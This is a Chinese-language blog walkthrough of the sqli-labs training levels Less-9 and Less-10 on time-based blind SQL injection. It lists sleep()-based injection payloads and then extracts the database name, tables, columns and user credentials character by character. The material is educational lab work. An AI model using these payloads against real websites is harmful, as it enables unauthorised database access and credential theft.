<!DOCTYPE html><html lang="en" data-theme="light"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,initial-scale=1"><title>sql-9 | 风不及你甜</title><meta name="author" content="wdraemv"><meta name="copyright" content="wdraemv"><meta name="format-detection" content="telephone=no"><meta name="theme-color" content="#ffffff"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="Less-9  时间盲注从题目中我们了解到了这是一道关于单引号时间盲注的题，那么我们先尝试 ?id&#x3D;1’ 发现返回的结果竟然是 You are in …  什么情况？于是分别尝试 ?id&#x3D;1  ?id&#x3D;1”  发现结果都是You are in … 于是可以大胆的猜测正确的输入和错误的输入返回的结果被设置成一样的了。 对比后台源码： 从源代码中证明了我们的猜测，由此也可得出这样的结论：1.不返回报错">
<meta property="og:type" content="article">
<meta property="og:title" content="sql-9">
<meta property="og:url" content="http://example.com/2021/01/20/sql-9/index.html">
<meta property="og:site_name" content="风不及你甜">
<meta property="og:description" content="Less-9  时间盲注从题目中我们了解到了这是一道关于单引号时间盲注的题，那么我们先尝试 ?id&#x3D;1’ 发现返回的结果竟然是 You are in …  什么情况？于是分别尝试 ?id&#x3D;1  ?id&#x3D;1”  发现结果都是You are in … 于是可以大胆的猜测正确的输入和错误的输入返回的结果被设置成一样的了。 对比后台源码： 从源代码中证明了我们的猜测，由此也可得出这样的结论：1.不返回报错">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://cdn.jsdelivr.net/gh/GlumeL/Photos/menhera/10.png">
<meta property="article:published_time" content="2021-01-20T06:20:04.000Z">
<meta property="article:modified_time" content="2021-05-24T15:45:40.474Z">
<meta property="article:author" content="wdraemv">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://cdn.jsdelivr.net/gh/GlumeL/Photos/menhera/10.png"><link rel="shortcut icon" href="/img/favicon.png"><link rel="canonical" href="http://example.com/2021/01/20/sql-9/"><link rel="preconnect" href="//cdn.jsdelivr.net"/><link rel="preconnect" href="//busuanzi.ibruce.info"/><link rel="stylesheet" href="/css/index.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free/css/all.min.css"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.css"><script>var GLOBAL_CONFIG = { 
  root: '/',
  hexoversion: '5.3.0',
  algolia: undefined,
  localSearch: undefined,
  translate: undefined,
  noticeOutdate: undefined,
  highlight: {"plugin":"highlighjs","highlightCopy":true,"highlightLang":true},
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  relativeDate: {
    homepage: false,
    post: false
  },
  runtime: '',
  date_suffix: {
    just: 'Just',
    min: 'minutes ago',
    hour: 'hours ago',
    day: 'days ago',
    month: 'months ago'
  },
  copyright: undefined,
  ClickShowText: undefined,
  lightbox: 'fancybox',
  Snackbar: undefined,
  justifiedGallery: {
    js: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/js/jquery.justifiedGallery.min.js',
    css: 'https://cdn.jsdelivr.net/npm/justifiedGallery/dist/css/justifiedGallery.min.css'
  },
  isPhotoFigcaption: ture,
  islazyload: false,
  isanchor: true
};

var saveToLocal = {
  set: function setWithExpiry(key, value, ttl) {
    const now = new Date()
    const expiryDay = ttl * 86400000
    const item = {
      value: value,
      expiry: now.getTime() + expiryDay,
    }
    localStorage.setItem(key, JSON.stringify(item))
  },

  get: function getWithExpiry(key) {
    const itemStr = localStorage.getItem(key)

    if (!itemStr) {
      return undefined
    }
    const item = JSON.parse(itemStr)
    const now = new Date()

    if (now.getTime() > item.expiry) {
      localStorage.removeItem(key)
      return undefined
    }
    return item.value
  }
}</script><script id="config_change">var GLOBAL_CONFIG_SITE = { 
  isPost: true,
  isHome: false,
  isHighlightShrink: false,
  isSidebar: true,
  postUpdate: '2021-05-24 23:45:40'
}</script><noscript><style type="text/css">
  #nav {
    opacity: 1
  }
  .justified-gallery img {
    opacity: 1
  }

  #recent-posts time,
  #post-meta time {
    display: inline !important
  }
</style></noscript><script>(function () {
  window.activateDarkMode = function () {
    document.documentElement.setAttribute('data-theme', 'dark')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#0d0d0d')
    }
  }
  window.activateLightMode = function () {
    document.documentElement.setAttribute('data-theme', 'light')
    if (document.querySelector('meta[name="theme-color"]') !== null) {
      document.querySelector('meta[name="theme-color"]').setAttribute('content', '#ffffff')
    }
  }

  const autoChangeMode = 'false'
  const t = saveToLocal.get('theme')
  if (autoChangeMode === '1') {
    const isDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches
    const isLightMode = window.matchMedia('(prefers-color-scheme: light)').matches
    const isNotSpecified = window.matchMedia('(prefers-color-scheme: no-preference)').matches
    const hasNoSupport = !isDarkMode && !isLightMode && !isNotSpecified

    if (t === undefined) {
      if (isLightMode) activateLightMode()
      else if (isDarkMode) activateDarkMode()
      else if (isNotSpecified || hasNoSupport) {
        const now = new Date()
        const hour = now.getHours()
        const isNight = hour <= 6 || hour >= 18
        isNight ? activateDarkMode() : activateLightMode()
      }
      window.matchMedia('(prefers-color-scheme: dark)').addListener(function (e) {
        if (saveToLocal.get('theme') === undefined) {
          e.matches ? activateDarkMode() : activateLightMode()
        }
      })
    } else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else if (autoChangeMode === '2') {
    const now = new Date()
    const hour = now.getHours()
    const isNight = hour <= 6 || hour >= 18
    if (t === undefined) isNight ? activateDarkMode() : activateLightMode()
    else if (t === 'light') activateLightMode()
    else activateDarkMode()
  } else {
    if (t === 'dark') activateDarkMode()
    else if (t === 'light') activateLightMode()
  }
})()</script><meta name="generator" content="Hexo 5.3.0"><link rel="alternate" href="/atom.xml" title="风不及你甜" type="application/atom+xml">
</head><body><div id="mobile-sidebar"><div id="menu_mask"></div><div id="mobile-sidebar-menus"><div class="mobile_author_icon"><img class="avatar-img" src="https://q2.qlogo.cn/headimg_dl?dst_uin=1034630181&amp;spec=100" onerror="onerror=null;src='/img/friend_404.gif'" alt="avatar"/></div><div class="mobile_post_data"><div class="mobile_data_item is-center"><div class="mobile_data_link"><a href="/archives/"><div class="headline">Articles</div><div class="length_num">69</div></a></div></div></div><hr/><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/-%E9%9F%B3%E4%B9%90"><i class="fa-fw /music/"></i><span> 清单|| fa fa-heartbeat</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div></div></div><div id="body-wrap"><div id="sidebar"><i class="fas fa-arrow-right on" id="toggle-sidebar"></i><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar">     </div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Less-9-%E6%97%B6%E9%97%B4%E7%9B%B2%E6%B3%A8"><span class="toc-number">1.</span> <span class="toc-text">Less-9  时间盲注</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AF%B9%E6%AF%94%E5%90%8E%E5%8F%B0%E6%BA%90%E7%A0%81%EF%BC%9A"><span class="toc-number">1.0.1.</span> <span class="toc-text">对比后台源码：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%A1%A5%E5%85%85%E5%B0%8F%E7%9F%A5%E8%AF%86%EF%BC%9A"><span class="toc-number">1.0.2.</span> <span class="toc-text">补充小知识：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E7%84%B6%E5%90%8E%E6%88%91%E4%BB%AC%E5%B0%B1%E6%9D%A5%E7%8C%9C%E6%95%B0%E6%8D%AE%E5%BA%93%E9%95%BF%E5%BA%A6%EF%BC%9A"><span class="toc-number">1.0.3.</span> <span class="toc-text">1.然后我们就来猜数据库长度：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E7%8C%9C%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%8D%E2%80%94-gt-%E5%BE%97%E5%88%B0security-%E6%95%B0%E6%8D%AE%E5%BA%93%EF%BC%9A"><span class="toc-number">1.0.4.</span> <span class="toc-text">2.猜数据库名—&gt; 得到security 数据库：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E7%8C%9C%E6%95%B0%E6%8D%AE%E5%BA%93%E8%A1%A8"><span class="toc-number">1.0.5.</span> <span class="toc-text">3.猜数据库表</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E7%8C%9Cusers%E8%A1%A8%E9%87%8C%E7%9A%84%E5%88%97-%EF%BC%88ASCII%E7%A0%81-i-105%EF%BC%89"><span class="toc-number">1.0.6.</span> <span class="toc-text">4.猜users表里的列 （ASCII码 i-105）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E7%8C%9Cusername%E7%9A%84%E5%80%BC%EF%BC%88ASCII%E7%A0%81-D-68%EF%BC%89"><span class="toc-number">1.0.7.</span> <span class="toc-text">5.猜username的值（ASCII码 D&#x3D;68）</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E6%B3%A8%EF%BC%9A"><span class="toc-number">1.0.7.1.</span> <span class="toc-text">注：</span></a></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Less-10"><span class="toc-number">2.</span> <span class="toc-text">Less-10</span></a></li></ol></div></div></div><header class="post-bg" id="page-header" style="background-image: url(https://cdn.jsdelivr.net/gh/GlumeL/Photos/menhera/10.png)"><nav id="nav"><span id="blog_name"><a id="site-name" href="/">风不及你甜</a></span><span id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><i class="fa-fw fas fa-home"></i><span> 首页</span></a></div><div class="menus_item"><a class="site-page" href="/archives/"><i class="fa-fw fas fa-archive"></i><span> 时间轴</span></a></div><div class="menus_item"><a class="site-page" href="/tags/"><i class="fa-fw fas fa-tags"></i><span> 标签</span></a></div><div class="menus_item"><a class="site-page" href="/categories/"><i class="fa-fw fas fa-folder-open"></i><span> 分类</span></a></div><div class="menus_item"><a class="site-page" href="/-%E9%9F%B3%E4%B9%90"><i class="fa-fw /music/"></i><span> 清单|| fa fa-heartbeat</span></a></div><div class="menus_item"><a class="site-page" href="/link/"><i class="fa-fw fas fa-link"></i><span> 友链</span></a></div><div class="menus_item"><a class="site-page" href="/about/"><i class="fa-fw fas fa-heart"></i><span> 关于</span></a></div></div><span class="close" id="toggle-menu"><a class="site-page"><i class="fas fa-bars fa-fw"></i></a></span></span></nav><div id="post-info"><div id="post-title"><div class="posttitle">sql-9</div></div><div id="post-meta"><div class="meta-firstline"><span class="post-meta-date"><i class="far fa-calendar-alt fa-fw post-meta-icon"></i><span class="post-meta-label">Created</span><time class="post-meta-date-created" datetime="2021-01-20T06:20:04.000Z" title="Created 2021-01-20 14:20:04">2021-01-20</time><span class="post-meta-separator">|</span><i class="fas fa-history fa-fw post-meta-icon"></i><span class="post-meta-label">Updated</span><time class="post-meta-date-updated" datetime="2021-05-24T15:45:40.474Z" title="Updated 2021-05-24 23:45:40">2021-05-24</time></span></div><div class="meta-secondline"> <span class="post-meta-separator">|</span><span class="post-meta-pv-cv"><i class="far fa-eye fa-fw post-meta-icon"></i><span class="post-meta-label">Post View:</span><span id="busuanzi_value_page_pv"></span></span></div></div></div></header><main class="layout_post" id="content-inner"><article id="post"><div class="post-content" id="article-container"><h1 id="Less-9-时间盲注"><a href="#Less-9-时间盲注" class="headerlink" title="Less-9  时间盲注"></a>Less-9  时间盲注</h1><p>从题目中我们了解到了这是一道关于单引号时间盲注的题，那么我们先尝试 ?id=1’ 发现返回的结果竟然是 You are in …  什么情况？于是分别尝试 ?id=1  ?id=1”  发现结果都是You are in … 于是可以大胆的猜测正确的输入和错误的输入返回的结果被设置成一样的了。</p>
<h3 id="对比后台源码："><a href="#对比后台源码：" class="headerlink" title="对比后台源码："></a>对比后台源码：</h3><p><img src="https://img-blog.csdnimg.cn/20200331210910911.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl8zOTkzNDUyMA==,size_16,color_FFFFFF,t_70" alt="img"></p>
<p>从源代码中证明了我们的猜测，由此也可得出这样的结论：1.不返回报错信息页面，无法进行基于报错信息的盲注。2.页面不存在true和false两种不同的页面，无法进行对比也就无法进行布尔盲注。</p>
<p><strong>一般来说，在页面没有任何回显和错误信息提示的时候，我们就会测试时间盲注这最后的手法。</strong></p>
<p><img src="http://m.qpic.cn/psc?/V53QcDQN3M0Z4223G6is1vw7KQ0WDRYf/ruAMsa53pVQWN7FLK88i5ufTykfbn7FOaVBaKHOo.TV69lpaeyq*RqfHjMJGgTNWM*zRa5Bb4Bg.eXDp9zvQRSfaZBn0jLJNEOW69smTghA!/b&bo=EgWVAwAAAAADB6M!&rf=viewer_4" alt="img"></p>
<p>发现只有语句页面延迟了，说明这是单引号时间盲注。<br>常用的判断语句:<br>‘ and if(1,sleep(5),1) %23</p>
<p>‘ and if(1=0,1,sleep(10)) –+</p>
<p>“ and if(1=0,1, sleep(10)) –+</p>
<p>) and if(1=0,1, sleep(10)) –+</p>
<p>‘) and if(1=0,1, sleep(10)) –+</p>
<p>“) and if(1=0,1, sleep(10)) –+</p>
<p>………..</p>
<h3 id="补充小知识："><a href="#补充小知识：" class="headerlink" title="补充小知识："></a>补充小知识：</h3><p>使用<br>if(查询语句,1,sleep(5))<br>即如果我们的查询语句为真，那么直接返回结果；如果我们的查询语句为假，那么过5秒之后返回页面。所以我们就根据返回页面的时间长短来判断我们的查询语句是否执行正确。<br>1.if(expr1,expr2,expr3) :判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句<br>2.sleep(n) ：将程序挂起一段时间 n单位为秒</p>
<h3 id="1-然后我们就来猜数据库长度："><a href="#1-然后我们就来猜数据库长度：" class="headerlink" title="1.然后我们就来猜数据库长度："></a>1.然后我们就来猜数据库长度：</h3><p>?id=1’ and if (length(database())=x ,sleep(5),1)–+</p>
<p>　　　　x从4开始增加，增加到8有明显的延迟，说明数据库的长度是8；</p>
<p>?id=1’ and if(length(database())=8,sleep(5),1) – #</p>
<h3 id="2-猜数据库名—-gt-得到security-数据库："><a href="#2-猜数据库名—-gt-得到security-数据库：" class="headerlink" title="2.猜数据库名—&gt; 得到security 数据库："></a>2.猜数据库名—&gt; 得到security 数据库：</h3><p>当前的数据库名：可以用 &lt;  &gt;  = 比较，对字符进行范围的判断，不断缩小范围</p>
<p>?id=1’ and if(left(database(),1)&gt;’r’ ,sleep(5),1)– #           页面有明显延迟</p>
<p>?id=1’ and if(left(database(),1)&gt;’s’ ,sleep(5),1)– #          页面无明显延迟</p>
<p>?id=1’ and if(left(database(),1)&gt;’t’ ,sleep(5),1)– #          页面无明显延迟</p>
<p>?id=1’ and if(left(database(),1)=’s’ ,sleep(5),1)– #          页面有明显延迟</p>
<p>……..<br>?id=1’ and if(left(database(),8)=’security’ ,sleep(5),1)– #          页面有明显延迟</p>
<p>当然也可以这样写：<br>正确的时候直接返回，不正确的时候等待 5 秒钟，只给出正确的：<br>?id=1’ and If(ascii(substr(database(),1,1))=115,1,sleep(5))–+<br>说明第一位是 s （ascii 码是 115）<br>?id=1’ and If(ascii(substr(database(),2,1))=101,1,sleep(5))–+<br>说明第一位是 e （ascii 码是 101）<br>….<br>以此类推，我们知道了数据库名字是 security</p>
<h3 id="3-猜数据库表"><a href="#3-猜数据库表" class="headerlink" title="3.猜数据库表"></a>3.猜数据库表</h3><p>?id=1’ and if(left((select table_name from information_schema.tables where table_schema=database() limit x,1),5)=’users’,sleep(5),1)–+</p>
<p><img src="/2021/01/20/sql-9/Users\ASUS\AppData\Roaming\Typora\typora-user-images\image-20210120162541682.png" alt="image-20210120162541682"></p>
<p>通过limit x,1 中x的变化，我们找到了users表</p>
<p>?id=1’ and if(left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)=’users’,sleep(5),1)–+</p>
<p>注意不建议使用这种方法猜数据库里的表，这种猜数据库表的概率太低，这种写法只能说你知道了security数据库可能有 users 表但你不确定，用这种语句可以确定数据库是否有该表，且该表在第几行，由下图可知，users表在第四行，而limit是从0开始的，所以x为3</p>
<p><img src="https://img-blog.csdnimg.cn/20200331225342637.png" alt="img"></p>
<p>既然上面的不靠谱，那么用另外一种方法吧：<br>正确的时候直接返回，不正确的时候等待 5 秒钟，只给出正确的：(注意拼写正确)</p>
<p>?id=1’ and If(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),1,1))=101,1,sleep(5))–+</p>
<p>?id=1’ and If(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 0,1),2,1))=109,1,sleep(5))–+</p>
<p>…..<br>猜测第一个数据表的第一位是 e,…依次类推，得到 emails<br>?id=1’ and If(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),1,1))=114,1,sleep(5))–+</p>
<p>?id=1’ and If(ascii(substr((select table_name from information_schema.tables where table_schema=’security’ limit 1,1),2,1))=101,1,sleep(5))–+</p>
<p>…….<br>猜测第二个数据表的第一位是 r,…依次类推，得到 referers<br>……<br>再以此类推，我们可以得到所有的数据表 emails,referers,uagents,users</p>
<h3 id="4-猜users表里的列-（ASCII码-i-105）"><a href="#4-猜users表里的列-（ASCII码-i-105）" class="headerlink" title="4.猜users表里的列 （ASCII码 i-105）"></a>4.猜users表里的列 （ASCII码 i-105）</h3><p>?id=1’ and If(ascii(substr((select column_name from information_schema.columns where table_name=’users’ and table_schema=database() limit 0,1),1,1))=105,1,sleep(5))–+<br>猜测 users 表的第一个列的第一个字符是 i，<br>以此类推，我们得到列名是 id，username，password</p>
<p>（and table_schema=database()这条语句不能少是因为要排除其他数据库可能也会有users表）</p>
<h3 id="5-猜username的值（ASCII码-D-68）"><a href="#5-猜username的值（ASCII码-D-68）" class="headerlink" title="5.猜username的值（ASCII码 D=68）"></a>5.猜username的值（ASCII码 D=68）</h3><p>?id=1’ and If(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))–+<br>猜测 username 的第一行的第一位<br>以此类推，我们得到数据库 username，password 的所有内容</p>
<h4 id="注："><a href="#注：" class="headerlink" title="注："></a>注：</h4><p>if(查询语句,1,sleep(5))里面的查询<br>语句都可以换成布尔盲注的语句，参考less-5，同理Less-5的语句也能换成less-9的查询语句，就是布尔盲注与延时注入相结合，要灵活运用。</p>
<h1 id="Less-10"><a href="#Less-10" class="headerlink" title="Less-10"></a>Less-10</h1><p>从题目中我们可以得出这是一道关于双引号时间盲注的题，也就是和Less-9十分类似，只需把单引号 ‘  替换成双引号 “ 其他操作不变。<br>查看下源码：</p>
<p><img src="https://img-blog.csdnimg.cn/20200401205928400.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl8zOTkzNDUyMA==,size_16,color_FFFFFF,t_70" alt="img"></p>
<p>发现是双引号；</p>
<p>过程与第九关一样。</p>
<p>over</p>
</div><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">Author: </span><span class="post-copyright-info"><a href="mailto:undefined">wdraemv</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">Link: </span><span class="post-copyright-info"><a href="http://example.com/2021/01/20/sql-9/">http://example.com/2021/01/20/sql-9/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">Copyright Notice: </span><span class="post-copyright-info">All articles in this blog are licensed under <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> unless stating additionally.</span></div></div><div class="tag_share"><div class="post-meta__tag-list"></div><div class="post_share"><div class="social-share" data-image="https://cdn.jsdelivr.net/gh/GlumeL/Photos/menhera/10.png" data-sites="facebook,twitter,wechat,weibo,qq"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js/dist/js/social-share.min.js" defer></script></div></div><nav class="pagination-post" id="pagination"><div class="prev-post pull-left"><a href="/2021/01/24/sql-11/"><img class="prev-cover" src="https://cdn.jsdelivr.net/gh/GlumeL/Photos/menhera/11.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Previous Post</div><div class="prev_info">sql-11，12</div></div></a></div><div class="next-post pull-right"><a href="/2020/12/20/sql-5/"><img class="next-cover" src="https://cdn.jsdelivr.net/gh/GlumeL/Photos/menhera/9.png" onerror="onerror=null;src='/img/404.jpg'"><div class="pagination-info"><div class="label">Next Post</div><div class="next_info">sqllabs-Less5，6，8</div></div></a></div></nav></article></main><footer id="footer"><div id="footer-wrap"><div class="copyright">&copy;2020 - 2021 By wdraemv</div><div class="framework-info"><span>Framework </span><a target="_blank" rel="noopener" href="https://hexo.io">Hexo</a><span class="footer-separator">|</span><span>Theme </span><a target="_blank" rel="noopener" href="https://github.com/jerryc127/hexo-theme-butterfly">Butterfly</a></div></div></footer></div><section id="rightside"><div id="rightside-config-hide"><button id="readmode" type="button" title="Read Mode"><i class="fas fa-book-open"></i></button><button id="darkmode" type="button" title="Switch Between Light And Dark Mode"><i class="fas fa-adjust"></i></button></div><div id="rightside-config-show"><button id="rightside_config" type="button" title="Setting"><i class="fas fa-cog"></i></button><button class="close" id="mobile-toc-button" type="button" title="Table Of Contents"><i class="fas fa-list-ul"></i></button><button id="go-up" type="button" title="Back To Top"><i class="fas fa-arrow-up"></i></button></div></section><div><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="/js/utils.js"></script><script src="/js/main.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><div class="js-pjax"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script></div><script defer="defer" id="fluttering_ribbon" mobile="false" src="https://cdn.jsdelivr.net/npm/butterfly-extsrc@1/dist/canvas-fluttering-ribbon.min.js"></script></div></body></html>